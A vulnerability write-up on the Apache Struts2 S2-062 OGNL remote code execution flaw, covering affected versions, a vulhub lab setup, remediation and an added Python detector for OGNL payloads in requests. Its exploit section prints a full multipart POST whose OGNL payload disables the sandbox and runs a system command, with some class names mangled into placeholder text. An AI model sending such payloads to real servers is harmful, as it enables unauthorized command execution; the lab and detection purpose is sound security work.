0x01 Vulnerability overview
S2-062 (CVE-2021-31805) is a remote code execution vulnerability in Apache Struts2. The fix for S2-061 (CVE-2020-17530) was incomplete, so some tag attributes can still evaluate OGNL expressions; an attacker who controls such attribute data can craft malicious input and execute arbitrary code on the server.
0x02漏洞威胁等级
高危。
0x03 Affected versions
Affected versions:
Struts 2.0.0 - Struts 2.5.29
Fixed versions:
Struts >= 2.5.30
0x04 Lab setup
The lab reuses the docker environment from vulhub/struts2/s2-061/, which ships Struts 2.5.25.
Link:
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
Pull the image and start the environment with:
docker-compose up -d
Access URL: http://127.0.0.1:8080/?id=
0x05 Reproduction
0x06 Exploit request
POST /index.action HTTP/1.1
Host: 192.168.79.132:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1095
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{
(#request.map=#@[email protected]{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@[email protected]{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@[email protected]{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@[email protected]{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@[email protected]{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
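For defenders, the two useful checks from this page are the affected-version range in 0x03 and the request shape shown above: a multipart form field whose value is an OGNL expression (`%{...}`) that reaches into the value stack and the `memberAccess` sandbox settings. The following is an added example (not from the original post or the Struts project) that applies both checks; the request body and boundary are constructed for the demo and are not a working payload.

```python
import re

# Indicators drawn from the request shown above; none occur in ordinary form data.
OGNL_BYPASS_MARKERS = (
    "#request", "struts.valueStack", "memberAccess",
    "excludedPackageNames", "excludedClasses", "InstanceManager",
)


def is_affected(version: str) -> bool:
    """True if a struts2-core version lies in the advisory range 2.0.0 - 2.5.29."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return (2, 0, 0) <= parts <= (2, 5, 29)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data splitter: returns {field_name: value}."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble or closing delimiter
            continue
        head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value.decode(errors="replace")
    return fields


def score_field(value: str) -> list:
    """Markers found in a field that carries an OGNL expression delimiter."""
    if "%{" not in value:
        return []
    return [m for m in OGNL_BYPASS_MARKERS if m in value]


def inspect_request(body: bytes, content_type: str) -> dict:
    """Return {field_name: [markers]} for every suspicious field in the request."""
    boundary = re.search(r"boundary=([^;\s]+)", content_type)
    if not boundary:
        return {}
    fields = parse_multipart(body, boundary.group(1))
    return {n: score_field(v) for n, v in fields.items() if score_field(v)}


# Constructed sample request (not a working exploit): one OGNL-looking field, one benign.
BOUNDARY = "----ConstructedBoundary"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = (
    b"------ConstructedBoundary\r\n"
    b'Content-Disposition: form-data; name="id"\r\n\r\n'
    b"%{(#request.m.setBean(#request.get('m2').get('memberAccess')) == true).toString()}\r\n"
    b"------ConstructedBoundary\r\n"
    b'Content-Disposition: form-data; name="name"\r\n\r\n'
    b"alice\r\n"
    b"------ConstructedBoundary--\r\n"
)
```

`inspect_request(SAMPLE_BODY, CONTENT_TYPE)` flags only the `id` field; the same function can be run over WAF or reverse-proxy captures of `POST /index.action` bodies.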
0x07 Remediation
The vendor has released a fixed version; affected users should upgrade to the latest release. Download link:
https://struts.apache.org/download.cgi#struts-ga
0x08 References
https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html